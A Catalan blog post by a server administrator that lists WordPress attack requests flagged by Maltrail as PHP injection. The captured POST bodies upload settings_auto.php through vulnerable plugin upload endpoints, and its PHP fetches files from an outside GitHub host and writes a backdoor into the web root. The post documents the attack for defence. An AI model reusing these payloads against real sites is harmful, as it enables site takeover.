dissabte, 22 de setembre del 2018

Peticions detectades per Maltrail com a potencial «PHP injection»

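Peticions que arriben al servidor. He substituït el nom de domini del servidor per URL-DOMINI; com que van cercant wp-admin, segurament es tracta d'un sistema d'atac dirigit a WordPress. (La cadena URL-DOMINI que apareix enmig del codi PHP capturat, per exemple davant de CURLOPT_RETURNTRANSFER, sembla un efecte d'aquesta mateixa substitució i no part de la petició original.)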

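Suposo que cerquen algun tipus de vulnerabilitat, però només he pujat el contingut per analitzar-lo en un altre moment. Pel que es veu a la captura, totes les peticions intenten pujar un fitxer anomenat settings_auto.php a través de punts de càrrega de fitxers de WordPress i de connectors, i el codi que porta intenta escriure /wp-content/vuln.php i /vuln.htm a l'arrel del lloc web; comprovar que aquests fitxers no existeixen al servidor és una primera verificació que els intents no han reeixit.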


URL-DOMINI/wp-admin/admin-ajax.php (POST --02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22action%22nm_personalizedproduct_upload_file--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22name%22upload.php--02485a6cfcd34a6fb9baa3826f1df2feContent-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now!
$im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploite), URL-DOMINI/wp-admin/admin-ajax.php?action=getcountryuser&cs=2 (POST --fb3e771fb1bc46fd8574153def3e543cContent-Disposition: form-data; name=%22popimg%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . 
%22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;@unlink(__FIL), URL-DOMINI/wp-admin/admin-post.php (POST --73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22page%22pagelines--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22settings_upload%22settings--73e122e8951f40d1ac6fdb8e1da1e423Content-Disposition: form-data; name=%22file%22; filename=%22settings_auto.php%22Vuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = ), URL-DOMINI/wp-content/plugins/barclaycart/uploadify/uploadify.php (POST --6919b300ff3848a9aa59b607a4054b2dContent-Disposition: form-data; name=%22Filedata%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! 
$im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . %22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   echo %22n), URL-DOMINI/wp-content/plugins/cherry-plugin/admin/import-export/upload.php (POST --0b046a619cbb41288861f394d4dbb9cbContent-Disposition: form-data; name=%22file%22; filename=%22files/settings_auto.php%22Content-Type: multipart/form-dataVuln!! patch it Now! $im = curl_init($url); curl_setopt($im, URL-DOMINICURLOPT_RETURNTRANSFER, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_CONNECTTIMEOUT, URL-DOMINI10); curl_setopt($im, URL-DOMINICURLOPT_FOLLOWLOCATION, URL-DOMINI1); curl_setopt($im, URL-DOMINICURLOPT_HEADER, URL-DOMINI0); return curl_exec($im); curl_close($im);}$check = $_SERVER['DOCUMENT_ROOT'] . %22/wp-content/vuln.php%22 ;$text = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php');$open = fopen($check, URL-DOMINI'w');fwrite($open, URL-DOMINI$text);fclose($open);if(file_exists($check)){    echo $check.%22%22;}else   echo %22not exits%22;echo %22done .\n %22 ;$check2 = $_SERVER['DOCUMENT_ROOT'] . 
%22/vuln.htm%22 ;$text2 = http_get('https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/vuln.txt');$open2 = fopen($check2, URL-DOMINI'w');fwrite($open2, URL-DOMINI$text2);fclose($open2);if(file_exists($check2)){    echo $check2.%22%22;}else   ec)